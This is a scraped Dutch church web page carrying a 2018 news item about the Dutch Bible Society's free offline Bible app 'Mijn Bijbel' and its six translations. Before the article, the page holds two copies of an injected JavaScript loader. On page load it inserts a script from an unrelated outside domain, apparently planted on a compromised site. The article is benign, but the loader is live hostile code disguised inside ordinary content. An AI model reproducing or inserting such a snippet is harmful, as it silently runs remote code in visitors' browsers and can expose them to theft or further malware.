;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Offline Bijbellezen: NBG lanceert gratis app - PKN Damwâld

Offline Bijbellezen: NBG lanceert gratis app

Gepubliceerd op: woensdag 10 januari 2018

Het NBG lanceert deze week de gratis app Mijn Bijbel. Met de app kan iedereen in zes vertalingen de Bijbel lezen, waaronder de Bijbel in Gewone Taal (BGT) en Nieuwe Bijbelvertaling (NBV). De vertalingen zijn downloadbaar en daardoor ook offline te lezen.

“Vanaf nu kan iedereen gratis én offline in de NBV en BGT lezen,” aldus directeur van het Nederlands Bijbelgenootschap Rieuwerd Buitenwerf. “Het leesgemak staat in deze app voorop. Je kan meteen beginnen met lezen zodra je de app hebt geïnstalleerd. Lettergrootte en lettertype zijn bijvoorbeeld aanpasbaar aan je eigen wensen. We verwachten dat de app ook veel gebruikt gaat worden in kerken, omdat je nu ook zonder wifi of 4G de NBV kunt lezen op je smartphone.”

Wat kunnen gebruikers met de app?
Met Mijn Bijbel kun je zes vertalingen lezen, die je kunt downloaden. De volgende vertalingen zijn opgenomen in de app: de Nieuwe Bijbelvertaling, de Bijbel in Gewone Taal, de Groot Nieuws Bijbel, de NBG-vertaling 1951, de Statenvertaling en de Fryske Bibel. Op het startscherm van de app staat de bijbeltekst van de dag. De app wordt stapsgewijs uitgebreid en is beschikbaar voor zowel Android als iOS.

Wereldwijd
Het NBG heeft de app samen met het Braziliaans bijbelgenootschap ontwikkeld. Ook andere bijbelgenootschappen wereldwijd gaan varianten van de app gebruiken voor hun lokale context.

De app Mijn Bijbel is vanaf deze week te downloaden in de Google Play Store en de App Store.